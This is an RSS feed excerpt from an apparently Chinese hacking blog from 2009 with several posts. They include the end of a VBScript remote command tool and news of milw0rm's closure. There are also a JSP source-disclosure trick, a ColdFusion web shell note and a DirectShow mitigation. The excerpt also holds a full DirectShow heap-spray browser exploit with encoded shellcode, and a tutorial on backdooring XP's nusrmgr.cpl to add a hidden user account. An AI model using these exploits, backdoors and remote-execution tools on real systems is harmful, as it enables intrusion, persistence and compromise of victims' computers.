outstreem.Write "."
End If
End Function
Sub usage()
wsh.echo string(79,"*")
wsh.echo "Rcmd v1.01 by NetPatch modiy by lcx"
wsh.echo "Usage:"
wsh.echo "cscript "&amp;wscript.scriptfullname&amp;" targetIP username password ""Command"" 1 //on echo"
wsh.echo "cscript "&amp;wscript.scriptfullname&amp;" targetIP username password ""Command"" 0 //off echo create "
wsh.echo "cscript "&amp;wscript.scriptfullname&amp;" targetIP username password """" 3 // create cdo.message.down.vbs "
wsh.echo string(79,"*")&amp;vbcrlf
end Sub</code></pre>
<p>下载：<a href="http://www.icehack.com/attachment.php?aid=57&amp;k=a0502b5b1cdc6997132bf2d27d4c7b6a&amp;t=1247026273&amp;fid=4&amp;sid=8094swPjBabFIjmFVbuGh2slsx6anahOXmAxYppZds6YYGQ">冰点论坛</a></p>
<p>鬼仔ps：<a href="http://huaidan.org/wp-content/uploads/2009/07/RCmd1.01.7z">备份</a></p>
<hr />
<a href="http://huaidan.org/archives/3215.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/technology" title="显示技术文章的所有日志" rel="category tag">技术文章</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3215.html" target="_blank">http://huaidan.org/archives/3215.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/3182.html" title="Rcmd.vbs [Remote Cmd with wmi] (2009/06/26)">Rcmd.vbs [Remote Cmd with wmi]</a> (2)</li>
	<li><a href="http://huaidan.org/archives/1434.html" title="高级内网渗透工具:Paris (创建VPN) (2007/10/28)">高级内网渗透工具:Paris (创建VPN)</a> (1)</li>
	<li><a href="http://huaidan.org/archives/1623.html" title="记一次简单的渗透测试经过 (2008/01/08)">记一次简单的渗透测试经过</a> (0)</li>
	<li><a href="http://huaidan.org/archives/1007.html" title="记一次对在线挂机网站的渗透 (2007/04/09)">记一次对在线挂机网站的渗透</a> (2)</li>
	<li><a href="http://huaidan.org/archives/2206.html" title="男生五分钟入门wmi (2008/08/06)">男生五分钟入门wmi</a> (0)</li>
</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/Y5dm4q7L3K92QDE3PJAAOsnrgPY/0/da"><img src="http://feedads.g.doubleclick.net/~a/Y5dm4q7L3K92QDE3PJAAOsnrgPY/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/Y5dm4q7L3K92QDE3PJAAOsnrgPY/1/da"><img src="http://feedads.g.doubleclick.net/~a/Y5dm4q7L3K92QDE3PJAAOsnrgPY/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3215.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>milw0rm 关闭了</title>
		<link>http://huaidan.org/archives/3213.html</link>
		<comments>http://huaidan.org/archives/3213.html#comments</comments>
		<pubDate>Wed, 08 Jul 2009 16:06:16 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[业界资讯]]></category>
		<category><![CDATA[milw0rm]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3213.html</guid>
		<description><![CDATA[update（2009-7-9 22:46）：milw0rm 现在又开了，不知道为什么，欺骗感情啊，原来的公告没了，投递也又开放了，没有任何说明，在 str0ke 的 twitter 上有这么一条（43分钟前发的）：
milw0rm's back up &#38;... ]]></description>
			<content:encoded><![CDATA[<p><span style="color: #ff0000;"><strong>update（2009-7-9 22:46）：</strong></span><strong>milw0rm 现在又开了</strong>，不知道为什么，欺骗感情啊，原来的公告没了，投递也又开放了，没有任何说明，在 str0ke 的 twitter 上有这么<a href="https://twitter.com/str0ke/status/2550494236" target="_blank">一条</a>（43分钟前发的）：</p>
<blockquote><p>milw0rm's back up &amp; posting will start once again, I can't let all of the emails in my submit box to just sit there.<a rel="bookmark" href="https://twitter.com/str0ke/status/2550494236">43 minutes ago</a> from web</p></blockquote>
<p><strong>ps：</strong>刚才更新过，说又开放了，结果现在又打不开了，不知道在做什么。<br />
--------------------------------------------------------<br />
<a href="http://huaidan.org/wp-content/uploads/2009/07/milw0rm_banner.jpg"><img class="size-full wp-image-3209 alignnone" title="milw0rm_banner" src="http://huaidan.org/wp-content/uploads/2009/07/milw0rm_banner.jpg" alt="milw0rm_banner" width="445" height="71" /></a></p>
<p>上午看到 milw0rm.com 首页的 banner 位置这样写着：</p>
<blockquote><p>Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.<br />
Be safe, /str0ke</p></blockquote>
<p><span id="more-3213"></span></p>
<p>投递也关闭了：</p>
<blockquote><p>submissions are closed.</p></blockquote>
<p>当时还想着把全站抓下来保存一份，结果刚才发现已经打不开了，应该是已经关闭了，非常非常可惜，这么一个站就这样关闭了。。。</p>
<p>最后贴几张图当作留念吧。</p>
<p>banner：<br />
<a href="http://huaidan.org/wp-content/uploads/2009/07/milw0rm_banner.jpg"><img class="size-full wp-image-3209 alignnone" title="milw0rm_banner" src="http://huaidan.org/wp-content/uploads/2009/07/milw0rm_banner.jpg" alt="milw0rm_banner" width="445" height="71" /></a></p>
<p>favicon：<br />
<a href="http://huaidan.org/wp-content/uploads/2009/07/milw0rm_favicon.png"><img class="alignnone size-full wp-image-3210" title="milw0rm_favicon" src="http://huaidan.org/wp-content/uploads/2009/07/milw0rm_favicon.png" alt="milw0rm_favicon" width="48" height="48" /></a></p>
<p>首页的最后截图（快照中抓取的）：<br />
<a href="http://huaidan.org/wp-content/uploads/2009/07/milw0rm_end.png"><img class="alignnone size-full wp-image-3211" title="milw0rm_end" src="http://huaidan.org/wp-content/uploads/2009/07/milw0rm_end.png" alt="milw0rm_end" width="557" height="618" /></a></p>
<p>群里有人说可能跟前段时间在 milw0rm 上公布的那个 Lxadmin（现在的 kloxo） 的 exp 有关，当时那个 exp 使很多站被黑，数据被清空，最后导致 Lxadmin 的作者 Ligesh 自杀。</p>
<p>相关链接：<br />
<a title="Techie hangs himself in HSR Layout " href="http://timesofindia.indiatimes.com/Bangalore/Techie-hangs-himself-in-HSR-Layout-/articleshow/4633101.cms" target="_blank">Techie hangs himself in HSR Layout </a><br />
<a title="Webhost hack wipes out data for 100,000 sites" href="http://www.theregister.co.uk/2009/06/08/webhost_attack/print.html" target="_blank">Webhost hack wipes out data for 100,000 sites</a></p>
<p>ps：有没有把 milw0rm 全站抓回来的朋友？希望能给大家共享下，谢谢了。</p>
<hr />
<a href="http://huaidan.org/archives/3213.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/news" title="显示业界资讯的所有日志" rel="category tag">业界资讯</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3213.html" target="_blank">http://huaidan.org/archives/3213.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/1655.html" title="Milw0rm.com 的源码 (2008/01/24)">Milw0rm.com 的源码</a> (5)</li>
</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/SJ5Ja0ZNjZpD7pqIqweltb1PifM/0/da"><img src="http://feedads.g.doubleclick.net/~a/SJ5Ja0ZNjZpD7pqIqweltb1PifM/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/SJ5Ja0ZNjZpD7pqIqweltb1PifM/1/da"><img src="http://feedads.g.doubleclick.net/~a/SJ5Ja0ZNjZpD7pqIqweltb1PifM/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3213.html/feed</wfw:commentRss>
		<slash:comments>42</slash:comments>
		</item>
		<item>
		<title>Sun One WebServer 6.1 JSP Source Viewing vulnerability</title>
		<link>http://huaidan.org/archives/3208.html</link>
		<comments>http://huaidan.org/archives/3208.html#comments</comments>
		<pubDate>Mon, 06 Jul 2009 06:32:06 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[工具收集]]></category>
		<category><![CDATA[Jsp]]></category>
		<category><![CDATA[Sun One WebServer]]></category>
		<category><![CDATA[Vulnerability]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3208.html</guid>
		<description><![CDATA[作者：Kingcope Kingcope &#60;kcope2_(at)_googlemail.com&#62;
Sun One WebServer 6.1 JSP Source Viewing vulnerability
System: Sun-ONE-Web-Server/6.1, Windows Server 2003
SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems ... ]]></description>
			<content:encoded><![CDATA[<p>作者：<a title="kcope2_(at)_googlemail.com" href="http://securityvulns.com/source43609.html" target="_blank">Kingcope Kingcope</a> &lt;<a href="mailto:kcope2_%28at%29_googlemail.com">kcope2_(at)_googlemail.com</a>&gt;</p>
<p>Sun One WebServer 6.1 JSP Source Viewing vulnerability</p>
<p>System: Sun-ONE-Web-Server/6.1, Windows Server 2003</p>
<p>SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose<br />
JSP Source code.<br />
<span id="more-3208"></span></p>
<p>A normal URL would look like:</p>
<p>http://server/hello.jsp</p>
<p>To disclose the contents including source code of a JSP file:</p>
<p>http://server/hello.jsp::$DATA</p>
<p>Best Regards,</p>
<p>Nikolaos Rangos</p>
<hr />
<a href="http://huaidan.org/archives/3208.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/tools" title="显示工具收集的所有日志" rel="category tag">工具收集</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3208.html" target="_blank">http://huaidan.org/archives/3208.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/2293.html" title="关于MySQL的SQL Column Truncation Vulnerabilities (2008/09/10)">关于MySQL的SQL Column Truncation Vulnerabilities</a> (0)</li>
	<li><a href="http://huaidan.org/archives/2617.html" title="入侵基于java Struts的JSP网站（续） (2008/12/16)">入侵基于java Struts的JSP网站（续）</a> (0)</li>
	<li><a href="http://huaidan.org/archives/2615.html" title="入侵基于java Struts的JSP网站 (2008/12/16)">入侵基于java Struts的JSP网站</a> (3)</li>
	<li><a href="http://huaidan.org/archives/1833.html" title="一个操作ORACLE的JSP工具 (2008/04/01)">一个操作ORACLE的JSP工具</a> (1)</li>
	<li><a href="http://huaidan.org/archives/902.html" title="[Full-disclosure] Firefox focus stealing vulnerability (possiblyother browsers) (2007/02/13)">[Full-disclosure] Firefox focus stealing vulnerability (possiblyother browsers)</a> (0)</li>
</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/WfXO1aY5yvxfDWR4s02RkGlCUTo/0/da"><img src="http://feedads.g.doubleclick.net/~a/WfXO1aY5yvxfDWR4s02RkGlCUTo/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/WfXO1aY5yvxfDWR4s02RkGlCUTo/1/da"><img src="http://feedads.g.doubleclick.net/~a/WfXO1aY5yvxfDWR4s02RkGlCUTo/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3208.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>More on ColdFusion hacks</title>
		<link>http://huaidan.org/archives/3207.html</link>
		<comments>http://huaidan.org/archives/3207.html#comments</comments>
		<pubDate>Mon, 06 Jul 2009 06:13:03 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[工具收集]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[WebShell]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3207.html</guid>
		<description><![CDATA[来源：http://isc.sans.org/diary.html?storyid=6730
Thanks to our reader Adam we received some additional information regarding recent ColdFusion hacks.
As I wrote in the previous diary (http://isc.sans.org/diary.html?storyid=6715), the attackers are ex... ]]></description>
			<content:encoded><![CDATA[<p>来源：<a href="http://isc.sans.org/diary.html?storyid=6730" target="_blank">http://isc.sans.org/diary.html?storyid=6730</a></p>
<p>Thanks to our reader Adam we received some additional information regarding recent ColdFusion hacks.<br />
As I wrote in the previous diary (<a href="http://isc.sans.org/diary.html?storyid=6715" target="_blank">http://isc.sans.org/diary.html?storyid=6715</a>), the attackers are exploiting vulnerable FCKEditor installations, which come enabled by default with ColdFusion 8.0.1 as well as some other ColdFusion packages.<br />
<span id="more-3207"></span></p>
<p>The first thing the attackers do is uploading a ColdFusion web shell – a script very similar to ASP.NET or PHP web shells we've been writing so much about. The web shell I analyzed is very powerful and seems to be recent – according to the date in the script it was released on the 23rd of June by a Chinese hacker "Seraph".</p>
<p>The script has a simple authentication mechanism – it verifies what the URL parameter "action" is set to, as can be seen in the screenshot below:</p>
<p><a href="http://huaidan.org/wp-content/uploads/2009/07/seraph.png"><img class="alignnone size-full wp-image-3205" title="seraph" src="http://huaidan.org/wp-content/uploads/2009/07/seraph.png" alt="seraph" width="516" height="163" /></a></p>
<p>If the parameter "action" is set to "seraph", the user can access the web site, otherwise the script just prints back "seraph". In other words, the URL the attacker accesses after uploading the script will look something like this: http://www.hacked.site/uploaded_file.cfm?action=seraph</p>
<p>A nice thing (for us doing forensics, at least) is that you can now grep through your logs for "action=seraph" to see if you have been hacked with the same script. Keep in mind that this is not a definite test, of course, since the action variable's name can be easily modified.</p>
<p>测试版下载：<a href="http://huaidan.org/wp-content/uploads/2009/07/cfm.txt">cfm.txt</a></p>
<hr />
<a href="http://huaidan.org/archives/3207.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/tools" title="显示工具收集的所有日志" rel="category tag">工具收集</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3207.html" target="_blank">http://huaidan.org/archives/3207.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/2853.html" title="隐藏并修改文件的最后修改时间的asp-webshell (2009/02/26)">隐藏并修改文件的最后修改时间的asp-webshell</a> (1)</li>
	<li><a href="http://huaidan.org/archives/1647.html" title="跨出WEBSHELL---网域高科行业B2B商务平台实例 (2008/01/21)">跨出WEBSHELL---网域高科行业B2B商务平台实例</a> (0)</li>
	<li><a href="http://huaidan.org/archives/48.html" title="蓝屏ASP木马愚人节版 (2005/04/14)">蓝屏ASP木马愚人节版</a> (0)</li>
	<li><a href="http://huaidan.org/archives/2531.html" title="艰难的在webshell中执行程序 (2008/11/14)">艰难的在webshell中执行程序</a> (6)</li>
	<li><a href="http://huaidan.org/archives/1096.html" title="突破SQL错误提示上传webshell (2007/05/21)">突破SQL错误提示上传webshell</a> (0)</li>
</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/a-MwGIYAc9UONlZgUyK2mE-NWSQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/a-MwGIYAc9UONlZgUyK2mE-NWSQ/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/a-MwGIYAc9UONlZgUyK2mE-NWSQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/a-MwGIYAc9UONlZgUyK2mE-NWSQ/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3207.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit</title>
		<link>http://huaidan.org/archives/3204.html</link>
		<comments>http://huaidan.org/archives/3204.html#comments</comments>
		<pubDate>Sun, 05 Jul 2009 16:36:57 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[工具收集]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[DirectShow]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[MPEG2]]></category>
		<category><![CDATA[网马]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3204.html</guid>
		<description><![CDATA[来源：Xeye
Microsoft DirectShow存在可被远程利用的堆栈溢出漏洞。
关键代码如下：
-------------------------以下内容有危险，仅为研究使用--------------

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+ap... ]]></description>
			<content:encoded><![CDATA[<p>来源：<a href="http://xeye.us/blog/2009/07/microsoft-directshow-mpeg2tunerequest-stack-overflow-exploit/" target="_blank">Xeye</a></p>
<p>Microsoft DirectShow存在可被远程利用的堆栈溢出漏洞。</p>
<p>关键代码如下：<br />
-------------------------以下内容有危险，仅为研究使用--------------<br />
<span id="more-3204"></span></p>
<pre><code>var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
"%u6363%u5251%u634c%u5553%u4550");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length&lt;slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace&lt;0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x&lt;300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';</code></pre>
<p>-------------------------------------</p>
<p>该shellcode会执行calc。</p>
<p>感谢代码分享者：咖啡。</p>
<p>感谢漏洞遗失者：~这里是马赛克~</p>
<hr />
<a href="http://huaidan.org/archives/3204.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/tools" title="显示工具收集的所有日志" rel="category tag">工具收集</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3204.html" target="_blank">http://huaidan.org/archives/3204.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/3203.html" title="DirectShow 0DAY第二波警告 (2009/07/06)">DirectShow 0DAY第二波警告</a> (3)</li>
	<li><a href="http://huaidan.org/archives/2028.html" title="关于FLASH ODAY的修改方法 (2008/05/30)">关于FLASH ODAY的修改方法</a> (6)</li>
	<li><a href="http://huaidan.org/archives/2624.html" title="MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day　网马生成器 (2008/12/16)">MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day　网马生成器</a> (0)</li>
	<li><a href="http://huaidan.org/archives/2027.html" title="Flash 0day生成器 (2008/05/29)">Flash 0day生成器</a> (14)</li>
	<li><a href="http://huaidan.org/archives/2029.html" title="FLASH 0DAY 详细分析和总结 (2008/05/31)">FLASH 0DAY 详细分析和总结</a> (0)</li>
</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/RpJ0r08GU40L_gv1oXkzS1pIyMY/0/da"><img src="http://feedads.g.doubleclick.net/~a/RpJ0r08GU40L_gv1oXkzS1pIyMY/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/RpJ0r08GU40L_gv1oXkzS1pIyMY/1/da"><img src="http://feedads.g.doubleclick.net/~a/RpJ0r08GU40L_gv1oXkzS1pIyMY/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3204.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>DirectShow 0DAY第二波警告</title>
		<link>http://huaidan.org/archives/3203.html</link>
		<comments>http://huaidan.org/archives/3203.html#comments</comments>
		<pubDate>Sun, 05 Jul 2009 16:33:29 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[业界资讯]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[DirectShow]]></category>
		<category><![CDATA[MPEG2]]></category>
		<category><![CDATA[网马]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3203.html</guid>
		<description><![CDATA[来源：80SEC非官方八卦BLOG
漏洞攻击形势：
DirectShow 0DAY第二波爆发！！该漏洞在国内已经呈大规模爆发形势。至少有几千网站被挂上了该漏洞的网页木马！
漏洞攻击细节：
与第一波的DirectShow 0D... ]]></description>
			<content:encoded><![CDATA[<p>来源：<a href="http://hi.baidu.com/80sec/blog/item/fea49f17d6ca9358f3de329d.html" target="_blank">80SEC非官方八卦BLOG</a></p>
<p><strong>漏洞攻击形势：</strong></p>
<p>DirectShow 0DAY第二波爆发！！该漏洞在国内已经呈大规模爆发形势。至少有几千网站被挂上了该漏洞的网页木马！</p>
<p><strong>漏洞攻击细节：</strong></p>
<p>与第一波的DirectShow 0DAY 不同，这次的漏洞是DirectShow相关msvidctl.dll组件解析畸形MPEG2视频格式文件触发溢出，攻击者可以使用普通的javascript堆喷射方式远程执行任意代码。<br />
<span id="more-3203"></span></p>
<p><strong>漏洞来源：</strong><a href="http://news.baike.360.cn/3451604/27274290.html">http://news.baike.360.cn/3451604/27274290.html</a></p>
<p><strong>漏洞临时解决方法：</strong></p>
<p>-------------------KillBit相关组件,将下面的内容保存为.reg文件双击即可.-------------------------</p>
<pre><code>Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400</code></pre>
<hr />
<a href="http://huaidan.org/archives/3203.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/news" title="显示业界资讯的所有日志" rel="category tag">业界资讯</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3203.html" target="_blank">http://huaidan.org/archives/3203.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/3204.html" title="Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit (2009/07/06)">Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit</a> (9)</li>
	<li><a href="http://huaidan.org/archives/3146.html" title="针对最近的那个DirectShow 0day的临时安全设置 (2009/06/06)">针对最近的那个DirectShow 0day的临时安全设置</a> (5)</li>
	<li><a href="http://huaidan.org/archives/1750.html" title="网马漏洞CLSID大全 (2008/03/07)">网马漏洞CLSID大全</a> (0)</li>
	<li><a href="http://huaidan.org/archives/2028.html" title="关于FLASH ODAY的修改方法 (2008/05/30)">关于FLASH ODAY的修改方法</a> (6)</li>
	<li><a href="http://huaidan.org/archives/2624.html" title="MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day　网马生成器 (2008/12/16)">MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day　网马生成器</a> (0)</li>
</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/rMjCtzEKb-K-tMWw77Ul9QwSHns/0/da"><img src="http://feedads.g.doubleclick.net/~a/rMjCtzEKb-K-tMWw77Ul9QwSHns/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/rMjCtzEKb-K-tMWw77Ul9QwSHns/1/da"><img src="http://feedads.g.doubleclick.net/~a/rMjCtzEKb-K-tMWw77Ul9QwSHns/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3203.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>利用cpl文件在xp中留一个后门</title>
		<link>http://huaidan.org/archives/3202.html</link>
		<comments>http://huaidan.org/archives/3202.html#comments</comments>
		<pubDate>Thu, 02 Jul 2009 10:11:56 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[cpl]]></category>
		<category><![CDATA[xp]]></category>
		<category><![CDATA[后门]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3202.html</guid>
		<description><![CDATA[# 鬼仔：为了不让首页截断部分出现图片，因为把图片位置换了下，不知道lcx会不会介意。
作者：lcx
这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么？是不是很吃惊，原来xp中控制面板... ]]></description>
			<content:encoded><![CDATA[<p># 鬼仔：为了不让首页截断部分出现图片，因为把图片位置换了下，不知道lcx会不会介意。</p>
<p>作者：<a href="http://hi.baidu.com/myvbscript/blog/item/cced313fe89448e555e723f4.html" target="_blank">lcx</a></p>
<p>这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么？是不是很吃惊，原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然，微软的好多组 件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因，它牵涉太多了，就算是反垄断法也不可能让微软删掉ie的。<br />
<span id="more-3202"></span></p>
<p>看到图中的那个NUSRMGR.HTA文件了吗？我们可以用它来做下手脚（当然你选别的js文件也是可以的）</p>
<p><a href="http://huaidan.org/wp-content/uploads/2009/07/xpl_xp.png"><img class="alignnone size-full wp-image-3201" title="xpl_xp" src="http://huaidan.org/wp-content/uploads/2009/07/xpl_xp.png" alt="xpl_xp" width="547" height="290" /></a></p>
<p>我们在里边加几行js语句：</p>
<pre><code>var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)</code></pre>
<p>当然你加下载者更好，我只是做个示例。</p>
<p>然后：</p>
<pre><code>echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl</code></pre>
<p>替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后，就会自动给你加一个帐户了。</p>
<p>这算是一个思路了，应当很鸡肋。如果要完美一点，可以查看一下别的cpl文件如何更改，如何无声无息的替掉原来的文件(如镜像劫持)。</p>
<hr />
<a href="http://huaidan.org/archives/3202.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/technology" title="显示技术文章的所有日志" rel="category tag">技术文章</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3202.html" target="_blank">http://huaidan.org/archives/3202.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/2540.html" title="打造XP下可运行的微型PE文件（292字节） (2008/11/14)">打造XP下可运行的微型PE文件（292字节）</a> (1)</li>
	<li><a href="http://huaidan.org/archives/96.html" title="巧妙利用.mdb后缀数据库做后门 (2005/04/22)">巧妙利用.mdb后缀数据库做后门</a> (0)</li>
	<li><a href="http://huaidan.org/archives/105.html" title="后门新思路 (2005/04/24)">后门新思路</a> (0)</li>
	<li><a href="http://huaidan.org/archives/2953.html" title="冰河暗涌防不胜防 BIOS下实现的Telnet后门 (2009/03/25)">冰河暗涌防不胜防 BIOS下实现的Telnet后门</a> (4)</li>
	<li><a href="http://huaidan.org/archives/2013.html" title="xp下双开3389源码 (2008/05/25)">xp下双开3389源码</a> (5)</li>
</ul>


